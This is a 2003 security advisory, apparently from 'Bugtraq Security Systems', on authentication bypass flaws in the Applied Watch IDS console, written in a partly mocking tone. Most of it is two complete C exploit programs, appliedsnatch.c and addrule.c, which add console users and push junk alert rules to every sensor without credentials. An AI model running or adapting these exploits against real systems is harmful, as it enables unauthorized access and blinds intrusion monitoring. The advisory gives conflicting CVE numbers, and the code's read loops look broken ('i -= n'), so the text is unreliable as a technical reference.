_BSSADV-0000.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Bugtraq Security Systems, Incorporated  
www.bugtraq.org  
  
Security Advisory  
  
Advisory Name: Multiple Issues in Applied Watch Command Center  
Release Date: 11/27/2003  
Application: Applied Watch  
Platform: Linux (IA32)  
Linux (sparc)  
Linux (sparc64)  
Linux (hppa)  
Linux (ppc)  
Linux (xbox)  
Linux (IA64)  
SUN Solaris (IA32)  
SUN Solaris (sparc)  
SUN Solaris (sparc64)  
OpenBSD (386)  
HPUX (hppa)  
HPUX (IA64)  
Compaq True64  
Microsoft Windows NT (Alpha)  
Microsoft Windows NT (IA32)  
Severity: Secure protocol implementation weaknesses, allows for  
authentication bypass and compromise of IDS nodes.  
Author: The Bugtraq Team, Collectively [[email protected]]  
Vendor Status: Patches pending.  
CVE Candidate: CAN-2003-0970 - Authentication Bypass to Add IDS Rules  
CAN-2003-0971 - Authentication Bypass to Add Users  
Reference: www.bugtraq.org/advisories/_BSSADV-0000.txt   
  
  
Overview:  
The Applied Watch Command Center boasts the industry's first  
truly OS-native platform for managing network threats in real-time. It  
frees users from the unreliable, more difficult, and less-secure   
Web-based monitoring enviornment of Snort IDS sensors. From a central,  
desktop console Supporting Mac, Linux, Unix, and Windows, thousands of   
IDS agents and the server can be monitored. The Command Center gives   
you these benefits:  
  
1. Interprets alerts generated by third-party solutions, parsing  
the alerts into high, medium, and low priority;  
2. Allows you to identify false positives;  
3. Lets you store notes on events to prevent duplication of   
effort, saving valuable man-hours;  
4. Provides greater security with an OS-native, desktop console;  
5. Lets you avoid the high cost of Security Information Management  
Systems (SIMs); and  
6. Reduces your IDS cost of ownership.  
  
It should also be noted that the lead developer of this system is  
named Jason Ish, who is a member of the core OpenBSD development team  
and is therefor a security expert. He has a son named Theo, named after  
the great pioneer of proactive security, Theo Deraadt.  
  
There exist a number of vulnerabilities in the various components  
of the Applied Watch software suite; this advisory being the first of   
many to come regarding the various logic-related security vulnerabilities  
in the software. After all such problems are eliminated from the codebase,  
we will begin releasing another set of advisories concerning multiple   
instances in the code that allow for the remote execution of arbitrary code  
throughout the various components of this system.  
  
  
Details:  
  
[1] Adding a User  
  
Using the attached program, appliedsnatch.c, a malicious individual on a  
network protected by the Applied Watch Solution can add new users to a   
console, without having to authenticate to the system.  
  
- --- begin appliedsnatch.c ---  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <netdb.h>  
#include <openssl/ssl.h>  
  
#define PUT_UINT32(i, val)\  
{\  
buf[(i) ++] = ((val) >> 24) & 0xff;\  
buf[(i) ++] = ((val) >> 16) & 0xff;\  
buf[(i) ++] = ((val) >> 8) & 0xff;\  
buf[(i) ++] = (val) & 0xff;\  
}  
  
int main(int argc, char *argv[])  
{  
unsigned char *buf;  
unsigned int idx, i;  
size_t userlen, passlen, buflen, lenidx;  
int sock;  
struct sockaddr_in sin;  
unsigned char respbuf[28];  
ssize_t n;  
SSL_CTX *sslctx;  
SSL *ssl;  
  
if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> <pass>\n", argv[0]); exit(1); }  
userlen = strlen(argv[3]);  
passlen = strlen(argv[4]);  
buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);  
memset(buf, 0, buflen);  
idx = 0;  
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */  
PUT_UINT32(idx, 0x6a);  
lenidx = idx;  
PUT_UINT32(idx, 0xf00fc7c8);  
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */  
PUT_UINT32(idx, userlen);  
memcpy(&buf[idx], argv[3], userlen); idx += userlen;  
idx |= 3; idx ++;  
PUT_UINT32(idx, passlen);  
memcpy(&buf[idx], argv[4], passlen); idx += passlen;  
idx |= 3; idx ++;  
PUT_UINT32(idx, 0x1);  
PUT_UINT32(idx, 0x1);  
PUT_UINT32(lenidx, idx);  
printf("connecting\n");  
memset(&sin, 0, sizeof(sin));  
sin.sin_family = AF_INET;  
sin.sin_port = htons(atoi(argv[2]));  
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)  
{  
struct hostent *he;  
  
if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }  
memcpy(&sin.sin_addr, he->h_addr, 4);  
}  
sock = socket(AF_INET, SOCK_STREAM, 0);  
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }  
printf("doing ssl handshake\n");  
SSL_load_error_strings();  
SSL_library_init();  
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }  
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }  
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }  
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }  
printf("sending %u bytes:\n", idx);  
for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);  
if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }  
printf("\nreading:\n");  
i = 0;  
while (i < sizeof(respbuf))  
{  
if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }  
i -= n;  
}  
for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);  
printf("\n");  
printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");  
SSL_shutdown(ssl);  
close(sock);  
return 0;  
}  
  
- --- end appliedsnatch.c ---  
  
  
[2] Adding a Rule  
  
Using the second attached program, addrule.c, a malicious individual can  
introduce custom IDS alerts to all sensor nodes on a network, allowing a  
human denial-of-service attack against the security experts monitoring the  
console. This is a valid technique for subverting intrusion detection   
systems. This is also a demonstration of the "sometimes good packets look  
like bad packets, while bad packets go unnoticed by the intrusion detection  
system" concept.  
  
- --- begin addrule.c ---  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <netdb.h>  
#include <openssl/ssl.h>  
  
#define PUT_UINT32(i, val)\  
{\  
buf[(i) ++] = ((val) >> 24) & 0xff;\  
buf[(i) ++] = ((val) >> 16) & 0xff;\  
buf[(i) ++] = ((val) >> 8) & 0xff;\  
buf[(i) ++] = (val) & 0xff;\  
}  
  
int main(int argc, char *argv[])  
{  
unsigned char *buf;  
unsigned int idx, i;  
size_t rulelen, buflen, lenidx;  
int sock;  
struct sockaddr_in sin;  
unsigned char respbuf[28];  
ssize_t n;  
SSL_CTX *sslctx;  
SSL *ssl;  
unsigned char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* *GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";  
  
if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(1); }  
rulelen = strlen(ruleset);  
buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);  
memset(buf, 0, buflen);  
idx = 0;  
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */  
PUT_UINT32(idx, 0x6f);  
lenidx = idx;  
PUT_UINT32(idx, 0xf00fc7c8);  
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */  
PUT_UINT32(idx, 0);  
PUT_UINT32(idx, 1);  
PUT_UINT32(idx, rulelen);  
memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;  
idx |= 3; idx ++;  
PUT_UINT32(lenidx, idx);  
printf("connecting\n");  
memset(&sin, 0, sizeof(sin));  
sin.sin_family = AF_INET;  
sin.sin_port = htons(atoi(argv[2]));  
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)  
{  
struct hostent *he;  
  
if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }  
memcpy(&sin.sin_addr, he->h_addr, 4);  
}  
sock = socket(AF_INET, SOCK_STREAM, 0);  
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }  
printf("doing ssl handshake\n");  
SSL_load_error_strings();  
SSL_library_init();  
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }  
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }  
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }  
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }  
printf("sending %u bytes:\n", idx);  
for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);  
if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }  
printf("\nreading:\n");  
i = 0;  
while (i < sizeof(respbuf))  
{  
if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }  
i -= n;  
}  
for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);  
printf("\n");  
printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");  
SSL_shutdown(ssl);  
close(sock);  
return 0;  
}  
  
- --- end addrule.c ---  
  
  
Vendor Response:  
Bugtraq Security have attempted to contact the vendor multiple  
times since the discovery of these vulnerabilities without success. A  
public statement issued by the founder of the company, Eric Hines, helps  
us understand why the company was unavailable for comment at the time:  
  
"You've got to realize that these people are walking around with  
exploits that vendors haven't even heard of yet. They're pissed and   
they've got this almost God-like power that enables them to break into  
any network that they want," Hines said. He reported that FateLabs.com  
was knocked offline last week by a denial-of-service attack immediately  
after the security firm published an advisory about a security bug.  
  
We expect that once their network recovers from said incident, that  
they will issue binary patches to both their clients and help reduce the  
threat of compromise against those networks. Undoubtably they are aware  
of these vulnerabilities already, and were hoping they would be brought  
to public attention as, according to their website, they are "soldiers  
for full disclosure".  
  
ThreatCon:  
The release of this information and exploits increases the Global  
ThreatCon Level to a record-breaking index of 9/13 (more dangerous than  
normal) level. We hope that Applied Watch will release their patches   
soon so that the ThreatCon can be lowered to a more reasonable level. If  
you have any questions regarding the Global ThreatCon, please visit  
http://www.bugtraq.org/threatcon.html  
  
  
Recommendation:  
If the security of your network is required, then Fatelabs /  
AppliedWatch products should be removed or disabled on the host in  
question. If it is not required, enterprises should deploy vendor patches  
for the above vulnerabilities when they become available. In addition,  
enterprises should look to remove all default services if not required in  
production systems or adequately protect those that are required and   
undertake other obvious security measures.  
  
Common Vulnerabilities and Exposures (CVE) Information:  
  
The Common Vulnerabilities and Exposures (CVE) project has assigned   
the following names to these issues. These are candidates for   
inclusion in the CVE list (http://cve.mitre.org), which standardizes   
names for security problems.  
  
CAN-2003-0960 - Logical error in Applied Watch Console allowing user-adds  
CAN-2003-0961 - Logical error in Applied Watch Nodes allowing rule-adds  
  
Bugtraq Security Systems Vulnerability Reporting Policy:   
http://www.bugtraq.org/research/policy/  
  
Bugtraq Security Systems Advisory Archive:  
http://www.bugtraq.org/advisories.html  
  
Bugtraq Security Systems PGP Key:  
http://www.bugtraq.org/pgp_key.asc  
  
Bugtraq Security Systems is currently seeking application security experts   
to fill several consulting positions. Applicants should have strong   
application development skills and be able to perform application security  
design reviews, code reviews, and application penetration testing. Please  
send resumes to [email protected]  
  
Copyright 2003 Bugtraq Security Systems. All rights reserved.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.1 (GNU/Linux)  
  
iD8DBQE/xqQad3IqHnpF3voRAk2vAJ9a7JgZ8p/FRCdgN/qjqYMEyYnj+QCgkGor  
vYwTicr3iCtfdrbxc0eeocY=  
=GAEl  
-----END PGP SIGNATURE-----  
`